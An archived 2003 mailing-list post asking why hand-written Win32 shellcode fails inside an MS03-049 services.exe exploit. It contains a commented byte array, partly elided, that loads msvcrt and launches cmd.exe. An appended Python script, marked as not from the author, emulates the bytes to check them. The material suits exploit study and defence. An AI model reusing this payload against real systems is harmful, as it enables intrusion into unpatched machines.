Win32 Shellcode question.

From: Vinay A. Maha*** (devnull001_at_fastmail.fm)
Date: 11/28/03

Date: Thu, 27 Nov 2003 19:29:18 -0800
To: vuln-dev@securityfocus.com, pentest@yahoogroups.com

I was writing an exploit for the MS03-049 services.exe stack overflow
vuln (from scratch for my own academic interest). Here's my shellcode to
simply launch a "cmd.exe" shell.

#define LL 0x7C4F05CF
#define SYS 0x78018EBF

char payload[] = {
  0x55, // push ebp
  0x8B, 0xEC, // mov ebp,esp

  0x33, 0xC0, // xor eax,eax
  0x50, // push eax
  0x50, // push eax
  0xC7, 0x45, 0xF8, 0x6D, 0x73, 0x76, 0x63,
         // mov dword ptr [ebp-8],6376736Dh
  0x66, 0xC7, 0x45, 0xFC, 0x72, 0x74,
         // mov word ptr [ebp-4],7472h
  0x8D, 0x45, 0xF8, // lea eax,[ebp-8]
  0x50, // push eax
  0xB8, 0xCF, 0x05, 0x4F, 0x7C, // mov eax,LL
  0xFF, 0xD0, // call eax <------------ Problem call
  0x8B, 0xE5, // mov esp,ebp

  0x33, 0xC0, // xor eax,eax
  0x50, // push eax
  0x50, // push eax
  0xC7, 0x45, 0xF8, 0x63, 0x6D, 0x64, 0x2E,
         // mov dword ptr [ebp-8],2E646D63h
  0x66, 0xC7, 0x45, 0xFC, 0x65, 0x78,
         // mov word ptr [ebp-4],7865h
  0xC6, 0x45, 0xFE, 0x65,
         // mov byte ptr [ebp-2],65h
  0x8D, 0x45, 0xF8, // lea eax,[ebp-8]
  0x50, // push eax
  0xB8, 0xBF, 0x8E, 0x01, 0x78,
         // mov eax,SYS
  0xFF, 0xD0, // call eax
...
  };

After the overflow, I can step through the NOP sled and reach the above
payload, meaning I have control over the CPU's exec path and can make
it execute my payload. However, I keep getting an "Access Violation
writing location..." error inside the "call eax" that corresponds with
LoadLibrary("msvcrt").

I have confirmed the LL and SYS variables for the target (Win2k SP4).
Plus, the payload works just fine when compiled and executed outside of
services.exe. Is there something special about services.exe that
prevents LoadLibraryA from executing normally, or what did I do wrong?
Can you spot anything I am overlooking? The same payload has worked on
other stack-overflow exploits, and inside a simple main(){} loop.

Thanks,
Vinay.
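As an added example (not from the post or its author), a small Python model of the handful of x86 encodings the byte array above uses; it walks the bytes, tracks writes to the frame, and reports for each "call eax" which NUL-terminated string the pushed argument points at and which address is called, so the hand-encoded immediates can be checked against the comments without running the payload. The frame base EBP is an assumed value.

```python
import struct

# Constructed copy of the byte sequence quoted in the post (the elided tail is omitted).
PAYLOAD = bytes([
    0x55, 0x8B, 0xEC, 0x33, 0xC0, 0x50, 0x50,
    0xC7, 0x45, 0xF8, 0x6D, 0x73, 0x76, 0x63, 0x66, 0xC7, 0x45, 0xFC, 0x72, 0x74,
    0x8D, 0x45, 0xF8, 0x50, 0xB8, 0xCF, 0x05, 0x4F, 0x7C, 0xFF, 0xD0, 0x8B, 0xE5,
    0x33, 0xC0, 0x50, 0x50,
    0xC7, 0x45, 0xF8, 0x63, 0x6D, 0x64, 0x2E, 0x66, 0xC7, 0x45, 0xFC, 0x65, 0x78,
    0xC6, 0x45, 0xFE, 0x65, 0x8D, 0x45, 0xF8, 0x50, 0xB8, 0xBF, 0x8E, 0x01, 0x78,
    0xFF, 0xD0,
])
EBP = 0x0012FF00  # assumed frame base; only offsets relative to it matter

def trace_calls(code):
    """Model the few x86 encodings the payload uses and return, for every
    'call eax', (string the pushed argument points at, address in eax)."""
    frame = bytearray(32)          # models memory [ebp-32 .. ebp-1]
    eax, esp, calls, i = 0, 0, [], 0
    def slot(disp):                # frame index for [ebp+disp8]
        return 32 + struct.unpack("<b", bytes([disp]))[0]

    while i < len(code):
        b2 = code[i:i + 2]
        if b2 == b"\xC7\x45":                       # mov dword [ebp+d8], imm32
            frame[slot(code[i+2]):slot(code[i+2]) + 4] = code[i+3:i+7]; i += 7
        elif code[i:i + 3] == b"\x66\xC7\x45":      # mov word [ebp+d8], imm16
            frame[slot(code[i+3]):slot(code[i+3]) + 2] = code[i+4:i+6]; i += 6
        elif b2 == b"\xC6\x45":                     # mov byte [ebp+d8], imm8
            frame[slot(code[i+2])] = code[i+3]; i += 4
        elif b2 == b"\x8D\x45":                     # lea eax, [ebp+d8]
            eax = EBP + struct.unpack("<b", code[i+2:i+3])[0]; i += 3
        elif code[i] == 0xB8:                       # mov eax, imm32
            eax = struct.unpack("<I", code[i+1:i+5])[0]; i += 5
        elif b2 == b"\x33\xC0":                     # xor eax, eax
            eax = 0; i += 2
        elif code[i] == 0x50:                       # push eax: store at new [esp]
            esp -= 4; frame[32 + esp:36 + esp] = struct.pack("<I", eax); i += 1
        elif b2 == b"\xFF\xD0":                     # call eax: first arg is at [esp]
            arg = struct.unpack("<I", frame[32 + esp:36 + esp])[0] - EBP
            calls.append((bytes(frame[32 + arg:]).split(b"\0")[0].decode(), eax))
            i += 2
        elif code[i] == 0x55:                       # push ebp (prologue, no effect here)
            i += 1
        elif b2 in (b"\x8B\xEC", b"\x8B\xE5"):      # mov ebp,esp / mov esp,ebp
            esp = 0; i += 2
        else:
            raise ValueError(f"unhandled opcode {code[i]:#04x} at offset {i}")
    return calls
```

For the bytes above this yields ("msvcrt", LL) followed by ("cmd.exe", SYS), confirming the immediates match the comments.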

